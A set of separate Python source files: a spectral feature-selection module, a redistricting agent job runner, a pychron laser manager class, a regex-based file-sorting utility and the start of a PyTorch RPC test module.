for rank, featureItem in enumerate(sortedFeatureScore['sorted_features']):
table_data.append([rank,
featureItem,
sortedFeatureScore['sorted_Separability'][rank],
sortedFeatureScore['sorted_Normalized_Separability'][rank],
sortedFeatureScore['sorted_K_cluster_Separability'][rank]])
table = DoubleTable(table_data,
title='{}'.format(str.upper(self.featureScoure['method'])))
table.justify_columns[2] = 'center'
return table
def __init__(self, X=None, k=None):
super(SPEC, self).__init__(X, 'SPEC')
self.k = k
self.featureScoure = {'method': 'SPEC',
'features': None,
'Separability_scores': np.array([]),
'Normalized_Separability_scores': np.array([]),
'K_cluster_Separability_scores': np.array([])}
def rank_features(self, X=None):
if X is not None:
self.fit(X)
elif self.hasFitted:
pass
else:
            raise ValueError('The model has not been fitted and X is None')
degreeMatrix = np.array(self.adjacencyMatrix.sum(axis=1))
graphLaplacian = np.subtract(np.diag(degreeMatrix), self.adjacencyMatrix)
# normalized graph Laplacian (alias name is used for memory efficiency purposes)
normalizedGraphLaplacian = graphLaplacian = np.power(degreeMatrix, -0.5) \
* graphLaplacian \
* np.power(degreeMatrix, -0.5)[:, np.newaxis]
del (graphLaplacian) # graphLaplacian is not valid any more.
# Calculate spectral Decomposition of normalized graph Laplacian
eigenValues, eigenVectors = np.linalg.eigh(np.dot(np.linalg.inv(normalizedGraphLaplacian),
normalizedGraphLaplacian))
# TODO: the eigen values have to be abs()
eigenValues = np.abs(eigenValues)
microDensityIndicator = eigenVectors[np.argmax(eigenValues)]
eigenValues, eigenVectors = sort_parja(eigenValues, eigenVectors, order=-1)
for feature in self.originData.columns:
featureVector = np.array(self.originData[feature].tolist())
featureVectorTilda = np.sqrt(degreeMatrix) * featureVector
featureVectorHat = featureVectorTilda / featureVectorTilda.sum()
            # TODO: the calculation needs to be checked against cosine similarity
# Ranking Function 1: the value of the normalized cut (Shi & Malik, 1997) - ascending
graphSeparability = np.dot(np.dot(featureVectorHat, normalizedGraphLaplacian),
featureVectorHat.transpose())
# Ranking Function 2: use spectral eigenValues to normalize the Ranking Function 1. - ascending
normalizedGraphSeparability = graphSeparability / (1 - np.dot(featureVectorHat, microDensityIndicator))
            # Ranking Function 3: if k (the number of clusters) is indicated, use only the
            # top-k eigenpairs to reduce noise.
            kGraphSeparability = 0
            if self.k is not None:
                for eigenValueItem, eigenVectorItem in heapq.nlargest(self.k, zip(eigenValues, eigenVectors)):
kGraphSeparability += eigenValueItem * np.power(
cosine_similarity([featureVector], [eigenVectorItem]), 2)
# Update the score list
self.featureScoure['Separability_scores'] = np.append(
self.featureScoure['Separability_scores'],
graphSeparability)
self.featureScoure['Normalized_Separability_scores'] = np.append(
self.featureScoure['Normalized_Separability_scores'],
normalizedGraphSeparability)
self.featureScoure['K_cluster_Separability_scores'] = np.append(
self.featureScoure['K_cluster_Separability_scores'],
kGraphSeparability)
def _check_params(self, X):
pass
def __test_me():
# sample data
'''
data = np.array([(1, 1, 1, 1, 1, 1, 1),
(2, 2, 2, 2, 1, 2, 2),
(2, 2, 45, 23, 24, 13, 16),
(3, 12, 0, 9, 5, 20, 89)])
data1 = np.array([("ind", "F1", "F2", "F3", "F4", "F5", "F6"),
(1, 1, 1, 1, 1, 1, 1),
(2, 2, 2, 2, 2, 2, 2),
(3, 4, 45, 23, 24, 19, 16),
(4, 2, 44, 23, 22, 13, 11),
(5, 2, 4, 3, 2, 1, 1),
(6, 1, 1, 1, 1, 1, 1),
(7, 2, 2, 2, 2, 2, 2),
(8, 2, 45, 23, 24, 13, 16),
(9, 12, 0, 9, 5, 20, 89),
(10, 6, 7, 8, 3, 8, 2)])
headers = ['A', 'B', 'C', 'D', 'E', 'F', 'G']
index = [1, 2, 3, 4]
df = pd.DataFrame(data, columns=headers, index=index, dtype=np.float)
'''
df = __configoration('config/config_lulesh_27p.json', '../parser/source.csv')
# feature selection
test2 = SPEC(k=2)
test2.fit(df)
test2.rank_features(df)
print(test2.featureScoure)
def __select_feature():
start = time.time()
# try:
args = arguments_parser()
df = __configoration(args['configPath'], args['csvPath'])
if args['featureSelectionMethod'] == 'LS':
featureSelectionModel = LaplacianScore(k=args['k_features'])
elif args['featureSelectionMethod'] == 'MCFS':
featureSelectionModel = MultiClusterScore(k=args['k_features'])
elif args['featureSelectionMethod'] == 'SPEC':
featureSelectionModel = SPEC(k=args['k_features'])
else:
pass
featureSelectionModel.fit(df, bag_size=args['bag_size'])
    featureSelectionModel.rank_features()  # fixme: when the data is already fitted it does not need to be refitted here
print("\n", featureSelectionModel.featureScoure)
print(featureSelectionModel.feature_score_table().table)
print("\033[32mThe feature selection process is successfully completed by {} method.".format(
featureSelectionModel.featureScoure.get("method")))
# except:
# print("\033[31mThe feature selection proses is failed.")
# finally:
duration = time.time() - start
print('\033[0mTotal duration is: %.3f' % duration)
if __name__ == '__main__':
# __test_me()
__select_feature()
|
run_job.py
|
import numpy as np
from bfagent import GreedyAgent
import argparse
import os
from multiprocessing import Pool, Queue
from tqdm import tqdm
from threading import Thread
import itertools
import pickle as pkl
metrics = ['population', 'pvi', 'compactness', 'projected_votes', 'race']
with open('resources/stripped_normalization.pkl', 'rb') as z_file:
means, stds = pkl.load(z_file)
metric_means = np.array(means)
metric_stds = np.array(stds)
tasks = []
# for i in range(len(metrics)):
# task_up = np.zeros(len(metrics))
# task_up[i] = 1
# task_down = np.zeros(len(metrics))
# task_down[i] = -1
# tasks.append(task_up)
# tasks.append(task_down)
# tasks = tasks * 9
tasks = list(map(np.array,itertools.product([-1., 0., 1.], [-1., 0., 1.], [-1., 0., 1.], [-1., 0., 1.], [-1., 0., 1.])))
if __name__ == '__main__':
argparser = argparse.ArgumentParser(description="Run a Greedy Agent task")
argparser.add_argument('n_steps', type=int)
args = argparser.parse_args()
n_steps = args.n_steps
status_queue = Queue()
def progress_monitor():
for i in tqdm(range(len(tasks) * n_steps)):
status_queue.get()
def process_task(i, task):
greedy_agent = GreedyAgent(metrics=metrics,pop_mean=metric_means,pop_std=metric_stds)
greedy_agent.set_task(task)
out_dir = os.path.join(os.path.dirname(__file__), 'logs')
if not os.path.exists(out_dir):
os.mkdir(out_dir)
task_str = ','.join(map(str, task))
with open(os.path.join(out_dir, task_str + '_exc_log_'+str(i)), 'w+') as exc_logger:
with open(os.path.join(out_dir, task_str + '_log_'+str(i)), 'w+') as logger:
return greedy_agent.run(n_steps, logger, exc_logger, status_queue)
thread = Thread(target=progress_monitor)
thread.start()
with Pool(96) as pool:
results = pool.starmap(process_task, list(enumerate(tasks)))
for res, config in results:
print('{}: {}'.format(','.join(map(str, config)), res))
|
fusions_laser_manager.py
|
# ===============================================================================
# Copyright 2011 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# =============enthought library imports=======================
from apptools.preferences.preference_binding import bind_preference
from traits.api import (
DelegatesTo,
Instance,
Str,
List,
Dict,
on_trait_change,
Event,
Bool,
Any,
)
from traitsui.api import HGroup, spring, UReadonly, Readonly
from pychron.core.helpers.strtools import to_bool
from pychron.core.pychron_traits import BorderVGroup
from pychron.hardware.fiber_light import FiberLight
from pychron.hardware.fusions.fusions_logic_board import FusionsLogicBoard
from pychron.lasers.laser_managers.laser_manager import LaserManager
from pychron.response_recorder import ResponseRecorder
class FusionsLaserManager(LaserManager):
""" """
laser_controller = Instance(FusionsLogicBoard)
fiber_light = Instance(FiberLight)
response_recorder = Instance(ResponseRecorder)
power_timer = None
brightness_timer = None
power_graph = None
_prev_power = 0
record_brightness = Bool
# recording_zoom = Float
# record = Event
# record_label = Property(depends_on='_recording_power_state')
_recording_power_state = Bool(False)
simulation = DelegatesTo("laser_controller")
data_manager = None
_data_manager_lock = None
_current_rid = None
chiller = Any
motor_event = Event
def finish_loading(self):
super(FusionsLaserManager, self).finish_loading()
self.do_motor_initialization()
# ===============================================================================
# IExtractionDevice interface
# ===============================================================================
def stop_measure_grain_polygon(self):
return self.stage_manager.stop_measure_grain_polygon()
def start_measure_grain_polygon(self):
return self.stage_manager.start_measure_grain_polygon()
def get_grain_polygon(self):
return self.stage_manager.get_grain_polygon()
def get_grain_polygon_blob(self):
return self.stage_manager.get_grain_polygon_blob()
def extract(self, power, units=None, **kw):
if self.enable_laser():
self.set_laser_power(power, units=units)
def end_extract(self):
self.disable_laser()
self.stop_pattern()
def open_motor_configure(self):
self.laser_controller.open_motor_configure()
def bind_preferences(self, pref_id):
self.debug("binding preferences")
super(FusionsLaserManager, self).bind_preferences(pref_id)
bind_preference(self, "recording_zoom", "{}.recording_zoom".format(pref_id))
bind_preference(
self, "record_brightness", "{}.record_brightness".format(pref_id)
)
self.debug("preferences bound")
def set_light(self, value):
try:
value = float(value)
except ValueError:
return
self.set_light_state(value > 0)
self.set_light_intensity(value)
def set_light_state(self, state):
if state:
self.fiber_light.power_on()
else:
self.fiber_light.power_off()
def set_light_intensity(self, v):
self.fiber_light.intensity = min(max(0, v), 100)
@on_trait_change("laser_controller:refresh_canvas")
def refresh_canvas(self):
if self.stage_manager:
self.stage_manager.canvas.request_redraw()
# @on_trait_change('pointer')
# def pointer_ononff(self):
# """
# """
# self.pointer_state = not self.pointer_state
# self.laser_controller.set_pointer_onoff(self.pointer_state)
def get_laser_watts(self):
return self._requested_power
def get_coolant_temperature(self, **kw):
""" """
chiller = self.chiller
if chiller is not None:
return chiller.get_coolant_out_temperature(**kw)
def get_coolant_status(self, **kw):
chiller = self.chiller
if chiller is not None:
return chiller.get_faults(**kw)
def do_motor_initialization(self):
self.debug("do motor initialization")
if self.laser_controller:
for motor in self.laser_controller.motors:
# motor = self.laser_controller.get_motor(name)
# if motor is not None:
def handle(obj, name, old, new):
# self.motor_event = (motor.name, new)
self.stage_manager.motor_event_hook(obj.name, new)
motor.on_trait_change(handle, "_data_position")
def set_beam_diameter(self, bd, force=False, **kw):
""" """
result = False
motor = self.get_motor("beam")
if motor is not None:
if motor.enabled or force:
self.set_motor("beam", bd, **kw)
result = True
return result
def set_zoom(self, z, **kw):
""" """
self.set_motor("zoom", z, **kw)
def set_motor_lock(self, name, value):
m = self.get_motor(name)
if m is not None:
m.locked = to_bool(value)
return True
def set_motor(self, *args, **kw):
self.stage_manager.motor_event_hook(*args, **kw)
return self.laser_controller.set_motor(*args, **kw)
def get_motor(self, name):
return next(
(mi for mi in self.laser_controller.motors if mi.name == name), None
)
def do_autofocus(self, **kw):
if self.use_video:
am = self.stage_manager.autofocus_manager
am.passive_focus(block=True, **kw)
def take_snapshot(self, *args, **kw):
if self.use_video:
return self.stage_manager.snapshot(auto=True, inform=False, *args, **kw)
def start_video_recording(self, name="video", *args, **kw):
if self.use_video:
return self.stage_manager.start_recording(basename=name)
def stop_video_recording(self, *args, **kw):
if self.use_video:
return self.stage_manager.stop_recording()
# def degasser_factory(self):
# from pychron.mv.degas.degasser import Degasser
#
# dm = Degasser(laser_manager=self)
# return dm
#
# def do_machine_vision_degas(self, lumens, duration, new_thread=False):
# if self.use_video:
# dm = self.degasser_factory()
#
# def func():
# dm.degas(lumens, duration)
#
# if new_thread:
# self._degas_thread = Thread(target=func)
# self._degas_thread.start()
# else:
# func()
# def get_peak_brightness(self, **kw):
# if self.use_video:
# args = self.stage_manager.find_lum_peak(**kw)
# if args is not None:
# pt, peaks, cpeaks, lum = args
# return peaks, lum
def get_brightness(self, **kw):
if self.use_video:
return self.stage_manager.get_brightness(**kw)
else:
return super(FusionsLaserManager, self).get_brightness(**kw)
def luminosity_degas_test(self):
self.enable_laser()
p = self.pulse.power
self.debug("luminosity degas test. {}".format(p))
self._luminosity_hook(p, autostart=True)
def set_stage_map(self, mapname):
if self.stage_manager is not None:
self.stage_manager.set_stage_map(mapname)
# ===============================================================================
# pyscript interface
# ===============================================================================
def show_motion_controller_manager(self):
""" """
stage_controller = self.stage_manager.stage_controller
package = "pychron.managers.motion_controller_managers"
if "Aerotech" in stage_controller.__class__.__name__:
klass = "AerotechMotionControllerManager"
package += ".aerotech_motion_controller_manager"
else:
klass = "NewportMotionControllerManager"
package += ".newport_motion_controller_manager"
module = __import__(package, globals(), locals(), [klass], -1)
factory = getattr(module, klass)
m = factory(motion_controller=stage_controller)
self.open_view(m)
def get_response_blob(self):
return (
self.response_recorder.get_response_blob() if self.response_recorder else ""
)
def get_output_blob(self):
return (
self.response_recorder.get_output_blob() if self.response_recorder else ""
)
def set_response_recorder_period(self, p):
if self.response_recorder:
self.response_recorder.period = p
def start_response_recorder(self):
if self.response_recorder:
self.response_recorder.start()
def stop_response_recorder(self):
if self.response_recorder:
self.response_recorder.stop()
# private
def _luminosity_hook(self, power, **kw):
self.degasser.degas(power, **kw)
def _move_to_position(self, position, autocenter):
if self.stage_manager is not None:
if isinstance(position, tuple):
if len(position) > 1:
x, y = position[:2]
self.stage_manager.linear_move(x, y)
if len(position) == 3:
self.stage_manager.set_z(position[2])
else:
self.stage_manager.move_to_hole(position)
return True
def _disable_hook(self):
self.degasser.stop()
return super(FusionsLaserManager, self)._disable_hook()
# ========================= views =========================
def get_control_buttons(self):
""" """
return [
("enable", "enable_label", None),
]
def get_power_group(self):
power_grp = BorderVGroup(
self.get_control_button_group(),
HGroup(
Readonly("requested_power", format_str="%0.2f", width=100),
spring,
UReadonly("units"),
spring,
),
label="Power",
)
return power_grp
def _get_record_label(self):
return "Record" if not self._recording_power_state else "Stop"
def _get_record_brightness(self):
return self.record_brightness and self._get_machine_vision() is not None
# ========================= defaults =======================
def _fiber_light_default(self):
""" """
return FiberLight(name="fiber_light")
if __name__ == "__main__":
d = FusionsLaserManager()
# ========================== EOF ====================================
# def get_power_database(self):
# def get_additional_group(self):
# og = Group(Item('laser_controller', show_label=False,
# editor=InstanceEditor(view='control_view'),
# style='custom'),
# label='Optics',
# )
# ac = Group(
# og,
# show_border=True,
# label='Additional Controls',
# layout='tabbed')
#
# aclist = self.get_additional_controls()
# if aclist is None:
# og.label = 'Optics'
# og.show_border = True
# ac = og
# else:
# for ai in aclist:
# ac.content.append(ai)
# return ac
# def get_control_group(self):
# '''
# '''
# power_grp = self.get_power_group()
# pulse_grp = Group(Item('pulse', style='custom', show_label=False),
# label='Pulse', show_border=True
# )
# power_grp = HGroup(power_grp, pulse_grp)
# ac = self.get_additional_group()
# g = HGroup(power_grp, ac)
#
# return g
# from pychron.database.adapters.power_adapter import PowerAdapter
#
# db = PowerAdapter(name=self.dbname,
# kind='sqlite')
# return db
# def get_power_calibration_database(self):
# from pychron.database.adapters.power_calibration_adapter import PowerCalibrationAdapter
#
# db = PowerCalibrationAdapter(name=self.dbname,
# kind='sqlite')
# return db
# def _subsystem_default(self):
# '''
# '''
# return ArduinoSubsystem(name='arduino_subsystem_2')
# def _brightness_meter_default(self):
# if self.use_video:
# b = BrightnessPIDManager(parent=self)
# # b.brightness_manager.video = self.stage_manager.video
#
# return b
# def get_control_items(self):
# '''
# '''
# # return Item('laser_controller', show_label=False,
# # editor=InstanceEditor(view='control_view'),
# # style='custom',
# # springy=False, height= -100)
#
# # return self.laser_controller.get_control_group()
# s = [('zoom', 'zoom', {}),
# ('beam', 'beam', {'enabled_when':'object.beam_enabled'})
# ]
# return self._update_slider_group_factory(s)
# def get_lens_configuration_group(self):
# return Item('lens_configuration',
# editor=EnumEditor(values=self.lens_configuration_names)
# )
# def get_optics_group(self):
# csliders = self.get_control_items()
# vg = HGroup(csliders,
# show_border=True,
# label='Optics', springy=False
# )
#
# lens_config = self.get_lens_configuration_group()
# if lens_config:
# vg.content.insert(0, lens_config)
#
# return vg
# def get_control_button_group(self):
# grp = HGroup(spring, Item('enabled_led', show_label=False, style='custom', editor=LEDEditor()),
# self._button_group_factory(self.get_control_buttons(), orientation='h'),
# # springy=True
# )
# return grp
# def collect_baseline_brightness(self, **kw):
# bm = self.brightness_manager
# if bm is not None:
# bm.collect_baseline(**kw)
#
# def get_laser_brightness(self, **kw):
# bm = self.brightness_manager
# if bm is not None:
# return bm.get_value(**kw)
# def _open_power_graph(self, graph):
# ui = graph.edit_traits()
# self.add_window(ui)
#
# def _dispose_optional_windows_hook(self):
# if self.power_graph is not None:
# self.power_graph.close()
# def _lens_configuration_changed(self):
#
# t = Thread(target=self.set_lens_configuration)
# t.start()
# def open_power_graph(self, rid, path=None):
# if self.power_graph is not None:
# self.power_graph.close()
# del(self.power_graph)
#
# g = StreamGraph(
# window_x=0.01,
# window_y=0.4,
# container_dict=dict(padding=5),
# # view_identifier='pychron.fusions.power_graph'
# )
# self.power_graph = g
#
# g.window_title = 'Power Readback - {}'.format(rid)
# g.new_plot(data_limit=60,
# scan_delay=1,
# xtitle='time (s)',
# ytitle='power (%)',
#
# )
# g.new_series()
#
# if self.record_brightness:
# g.new_series()
#
# invoke_in_main_thread(self._open_power_graph, g)
# def finish_loading(self):
# '''
# '''
# # if self.fiber_light._cdevice is None:
# # self.fiber_light._cdevice = self.subsystem.get_module('FiberLightModule')
#
# super(FusionsLaserManager, self).finish_loading()
# # self.load_lens_configurations()
# def load_lens_configurations(self):
# for config_name in ['gaussian', 'homogenizer']:
# config = self.get_configuration(name=config_name)
# if config:
# self.info('loading lens configuration {}'.format(config_name))
# self.lens_configuration_names.append(config_name)
#
# offset = tuple(map(int, self.config_get(config, 'General', 'offset', default='0,0').split(',')))
#
# bd = self.config_get(config, 'General', 'beam', cast='float')
# user_enabled = self.config_get(config, 'General', 'user_enabled', cast='boolean', default=True)
# self.lens_configuration_dict[config_name] = (bd, offset, user_enabled)
#
# self.set_lens_configuration('gaussian')
#
# def set_lens_configuration(self, name=None):
# if name is None:
# name = self.lens_configuration
#
# try:
# bd, offset, enabled = self.lens_configuration_dict[name]
# except KeyError:
# return
#
# self.stage_manager.canvas.crosshairs_offset = offset
#
# self.set_beam_diameter(bd, force=True)
# self.beam_enabled = enabled
# def _write_h5(self, table, v, x):
# dm = self.data_manager
# table = dm.get_table(table, 'Power')
# if table is not None:
# row = table.row
# row['time'] = x
# row['value'] = v
# row.append()
# table.flush()
# def _record_brightness(self):
# cp = self.get_laser_brightness(verbose=False)
# if cp is None:
# cp = 0
#
# xi = self.power_graph.record(cp, series=1)
# self._write_h5('brightness', cp, xi)
#
# def _record_power(self):
# p = self.get_laser_watts()
#
# if p is not None:
# self._prev_power = p
# else:
# p = self._prev_power
#
# if p is not None:
# try:
# x = self.power_graph.record(p)
# self._write_h5('internal', p, x)
# except Exception, e:
# self.info(e)
# print 'record power ', e
# def start_power_recording(self, rid):
# self._recording_power_state = True
# m = 'power and brightness' if self.record_brightness else 'power'
# self.info('start {} recording for {}'.format(m, rid))
# self._current_rid = rid
#
# # zoom in for recording
# self._previous_zoom = self.zoom
# self.set_zoom(self.recording_zoom, block=True)
#
# self.open_power_graph(rid)
#
# self.data_manager = dm = H5DataManager()
# self._data_manager_lock = Lock()
#
# dw = DataWarehouse(root=os.path.join(self.db_root, 'power'))
# dw.build_warehouse()
#
# dm.new_frame(directory=dw.get_current_dir(),
# base_frame_name=rid)
# pg = dm.new_group('Power')
# dm.new_table(pg, 'internal')
#
# if self.power_timer is not None and self.power_timer.isAlive():
# self.power_timer.Stop()
#
# self.power_timer = Timer(1000, self._record_power)
#
# if self._get_record_brightness():
# dm.new_table(pg, 'brightness')
# if self.brightness_timer is not None and self.brightness_timer.isAlive():
# self.brightness_timer.Stop()
#
# # before starting the timer collect quick baseline
# # default is 5 counts @ 25 ms per count
# if self._get_record_brightness():
# self.collect_baseline_brightness()
# self.brightness_timer = Timer(175, self._record_brightness)
#
# def stop_power_recording(self, delay=5, save=True):
#
# def _stop():
# self._recording_power_state = False
# if self.power_timer is not None:
# self.power_timer.Stop()
# if self.brightness_timer is not None:
# self.brightness_timer.Stop()
#
# self.info('Power recording stopped')
# self.power_timer = None
# self.brightness_timer = None
# if save:
# db = self.get_power_database()
# if db.connect():
# dbp = db.add_power_record(rid=str(self._current_rid))
# self._current_rid = None
# db.add_path(dbp, self.data_manager.get_current_path())
# db.commit()
#
# else:
# self.data_manager.delete_frame()
#
# self.data_manager.close_file()
#
# self.set_zoom(self._previous_zoom)
# '''
# analyze the power graph
# if requested power greater than 1.5
# average power should be greater than 2
# '''
# if self._requested_power > 1.5:
# ps = self.power_graph.get_data(axis=1)
# a = sum(ps) / len(ps)
# if a < 2:
# self.warning('Does not appear laser fired. Average power reading ={}'.format(a))
#
# # delay = 0
# if self.power_timer is not None:
#
# if delay == 0:
# _stop()
# else:
# self.info('Stopping power recording in {} seconds'.format(delay))
# t = DoLaterTimer(delay, _stop)
# t.start()
# def show_video_controls(self):
# '''
# '''
# self.video_manager.edit_traits(view = 'controls_view')
# def launch_laser_pulse(self):
# '''
# '''
# p = os.path.join(paths.scripts_dir, 'laserscripts', 'laser_pulse.txt')
# pulse = LaserPulseScript(manager = self)
# pulse._load_script(p)
# pulse.edit_traits()
# def show_power_scan(self):
# '''
# '''
#
# pp = os.path.join(paths.scripts_dir, 'laserscripts', 'power_scans')
# pscan = PowerScanScript(manager = self, source_dir = pp)
# pscan.start()
# pscan.open()
# def traits_view(self):
# '''
# '''
# title = self.__class__.__name__ if self.title == '' else self.title
# vg = VSplit()
#
# hooks = [h for h in dir(self) if '__group__' in h]
# for h in hooks:
# vg.content.append(getattr(self, h)())
#
# return View(#HSplit(
# #Item('stream_manager', show_label = False, style = 'custom'),
# vg,
# # ),
# resizable = True,
# # menubar = self._menubar_factory(),
# title = title,
# handler = self.handler_klass)
# def _stage_manager_factory(self, args):
# if self.use_video:
# klass = VideoStageManager
# else:
# klass = StageManager
#
# sm = klass(**args)
# return sm
#
# def show_stage_manager(self, **kw):
# #self.stage_manager.controllable = True
# self.stage_manager.edit_traits(**kw)
#
# def close_stage_manager(self):
# self.stage_manager.close_ui()
# def _show_streams_(self, available_streams):
# sm = self.stream_manager
# dm = sm.data_manager
#
# available_streams.append(self.laser_controller)
#
# streams = sm.open_stream_loader(available_streams)
#
# if streams:
#
# self.streaming = True
# self.dirty = True
# if streams != 'running':
# for s in streams:
# p = s['parent']
# name = p.name
#
# dm.add_group(name)
# table = 'stream'
# dm.add_table(table, parent = 'root.%s' % name)
# sm.set_stream_tableid(name, 'root.%s.%s' % (name, table))
# self.stream_manager.edit_traits()
# def show_laser_control(self):
# self.edit_traits()
#
# def show_stage_manager(self):
# '''
# '''
# self.stage_manager.edit_traits()
# def show_motor_configurer(self):
# self.laser_controller.configure_motors()
# def show_video(self):
# self.video_manager = VideoManager()
# self.video_manager.edit_traits()
# def stop_streams(self):
# '''
# '''
# self.streaming = False
# self.stream_manager.stop_streams()
# def show_preferences(self):
# preferences.edit_traits()
# def get_menus(self):
# '''
# '''
# return [('File', [dict(name = 'Preferences', action = 'show_preferences',),
# #dict(name = 'Open Graph', action = 'open_graph'),
# #dict(name = 'Video Controls', action = 'show_video_controls')
# ]),
#
# ('Devices', [
# #dict(name = 'Laser Controller', action = 'show_laser_controller'),
# #dict(name = 'Laser Stats', action = 'show_laser_stats'),
# dict(name = 'Stage Manager', action = 'show_stage_manager'),
# dict(name = 'Configure Motion Controller', action = 'show_motion_controller_manager',
# #enabled_when='not stage_simulation'
# ),
# dict(name = 'Configure Motors', action = 'show_motor_configurer'),
# # dict(name = 'Video', action = 'show_video')
# ]),
# # ('Streams', [dict(name = 'Streams...', action = 'show_streams'),
# # dict(name = 'Stop', action = 'stop_streams', enabled_when = 'streaming'),
# # #dict(name = 'Save Graph ...', action = '_save_graph', enabled_when = 'dirty')
# # ]),
#
#
# self.get_calibration_menu()
#
# ]
# # def get_calibration_menu(self):
# # '''
# # '''
# # return ('Calibration', [
# # dict(name = 'Power Map', action = 'launch_power_map'),
# # dict(name = 'Beam Scan', action = 'launch_beam_scan')
# ## dict(name = 'Power Scan', action = 'launch_power_scan'),
# ## dict(name = 'Laser Pulse', action = 'launch_laser_pulse')
# # ]
# # )
# def control_group(self):
# cg = VGroup(
# HGroup(
# # Item('simulation_led', show_label = False, style = 'custom', editor = LEDEditor()),
# Item('enabled_led', show_label = False, style = 'custom', editor = LEDEditor()),
# self._button_factory('enable', 'enable_label', None),
# ),
#
# self._slider_group_factory([('request_power', 'request_power',
# {'enabled_when':'object.parent._enabled',
# 'defined_when':'object.parent.use_power_slider'
# }
# #{'defined_when':'"Diode" not in object.parent.__class__.__name__'}
# )]),
# self._update_slider_group_factory([('zoom', 'zoom', {})]),
# self._update_slider_group_factory([('beam', 'beam', {})]),
#
# defined_when = 'object.controllable'
# )
# return cg
|
sort.py
|
from queue import Queue
from threading import Thread
import os
import shutil
import re
# --------------------------------------------------------------------
# Get the list of files in the current directory,
# group the filenames by the common part matched by a user-supplied regex,
# create a folder for each group, and move the files into it.
# If empty folders need to be cleared afterwards, change the bool.
# --------------------------------------------------------------------
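# Example (hypothetical filenames): with the pattern r"(\w+)_\d+\.jpg",
# "trip_001.jpg" and "trip_002.jpg" both capture "trip" and are moved into a
# folder named "trip", while "cat_01.jpg" ends up in a folder named "cat".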
threading_num: int = 4
def SortFile(q: Queue):
    """Worker: take {folder: [files]} dicts off the queue and move the files in."""
    while not q.empty():
        a_dict: dict = q.get()
        for Folder in a_dict.keys():
            if not os.path.exists(Folder):
                # exist_ok guards against a race when several threads create the same folder.
                os.makedirs(Folder, exist_ok=True)
                print("{folder} is created.".format(folder=Folder))
            for File in a_dict[Folder]:
                shutil.move(File, os.path.join(Folder, File))
            print("{folder} is finished.".format(folder=Folder))
def main():
    entries: list[str] = os.listdir()
    script_name: str = os.path.basename(__file__)
    files: list[str] = []
    for i in entries:
        if os.path.isfile(i) and i != script_name:
            files.append(i)
common_dict: dict[str, list[str]] = {}
    Accepted: bool = False
    accept_response: str = ""
while not Accepted:
        pattern: str = input("Key in a regex pattern: ")
        if not pattern:
            return None
        try:
            compiled_pattern = re.compile(pattern)
        except re.error as err:
            print("Invalid pattern: {}".format(err))
            continue
        common_dict.clear()
        for i in files:
            pattern_search_tuple = compiled_pattern.search(i)
common_str: str = ""
if pattern_search_tuple:
if pattern_search_tuple.groups() != ():
common_str = "".join(pattern_search_tuple.groups())
else:
common_str = pattern_search_tuple[0]
else:
continue
if common_str in common_dict:
common_dict[common_str].append(i)
else:
common_dict[common_str] = [i]
for i in common_dict.keys():
print(i, " : ", common_dict[i], "\n")
print("\n\nTotal : ", len(common_dict.keys()))
        accept_response = input(
            "This is the match result. Is it correct?\n"
            "(press Enter to accept; type `inone` to move everything into one folder; "
            "anything else lets you retry the pattern) ")
        if accept_response in ["", "inone"]:
            Accepted = True
    File_Queue: Queue = Queue()
    if accept_response == "":
        for i in common_dict.keys():
            File_Queue.put({i: common_dict[i]})
    elif accept_response == "inone":
        Inone_Folder_name: str = input("inone folder's name: ")
        for i in common_dict.keys():
            File_Queue.put({Inone_Folder_name: common_dict[i]})
threading_list: list[Thread] = []
for _ in range(threading_num):
threading_list.append(Thread(target=SortFile, args=(File_Queue,)))
for i in threading_list:
i.start()
for i in threading_list:
i.join()
print("\n\n\n\n\n")
if __name__ == "__main__":
    try:
        while True:
            main()
    except OSError as err:  # IOError is an alias of OSError in Python 3
        with open("sortpy.OSError.log", "w") as log:
            log.write(str(err))
        print("\n\nAn error occurred.\a")
    finally:
        print("\n\nThe end.")
        input()
|
rpc_test.py
|
import concurrent.futures
import contextlib
import json
import os
import sys
import threading
import time
from collections import namedtuple
from functools import partial
from threading import Event
from threading import Lock
from unittest import mock
import torch
import torch.nn as nn
import torch.distributed as dist
import torch.distributed.rpc as rpc
import torch.distributed.autograd as dist_autograd
from torch.distributed.rpc import RRef, _get_debug_info, _rref_context_get_debug_info
from torch.distributed.rpc.api import _delete_all_user_and_unforked_owner_rrefs, _use_rpc_pickler, _thread_local_var, _wait_all
from torch.distributed.rpc.internal import (
PythonUDF,
RPCExecMode,
_internal_rpc_pickler,
_build_rpc_profiling_key,
)
from torch.futures import Future
from torch.testing._internal.common_distributed import (
skip_if_lt_x_gpu,
captured_output,
)
from torch.testing._internal.common_utils import IS_MACOS, load_tests, sandcastle_skip_if
from torch.testing._internal.dist_utils import (
dist_init,
get_function_event,
initialize_pg,
wait_until_node_failure,
wait_until_pending_futures_and_users_flushed,
wait_until_owners_and_forks_on_rank,
worker_name,
)
from torch.testing._internal.distributed.rpc.rpc_agent_test_fixture import (
RpcAgentTestFixture,
)
from torch.testing._internal.common_utils import TemporaryFileName
from torch.autograd.profiler_legacy import profile as _profile
def foo_add():
return torch.add(torch.ones(1), torch.ones(1))
def udf_with_torch_ops(device=-1, use_record_function=False):
device_ctx = contextlib.suppress() if device == -1 else torch.cuda.device(device)
record_function_ctx = (
torch.autograd.profiler.record_function("##forward##")
if use_record_function
else contextlib.suppress()
)
with device_ctx, record_function_ctx:
t1, t2 = torch.ones(1), torch.ones(1)
t = torch.add(t1, t2)
t = torch.mul(t, t)
t = t.relu()
t = t.sigmoid()
# Events (operator invocations) that are expected to run as part of the above
# function.
EXPECTED_REMOTE_EVENTS = [
"aten::ones",
"aten::ones",
"aten::add",
"aten::mul",
"aten::relu",
"aten::clamp_min",
"aten::sigmoid",
]
# Remote operations are prefixed with the following string for RPC profiling.
REMOTE_OP_STR = "#remote_op: "
VALUE_FUTURE = concurrent.futures.Future()
DONE_FUTURE = concurrent.futures.Future()
FIFTY_MIL_CYCLES = 50000000
_rpc_barrier_count = 0
def _increment_count():
global _rpc_barrier_count
_rpc_barrier_count += 1
def _reset_count():
global _rpc_barrier_count
_rpc_barrier_count = 0
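# A stand-in RPC agent used by the backend-registration test; it only needs to
# report a plausible set of worker infos.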
class StubRpcAgent:
def __init__(self, world_size):
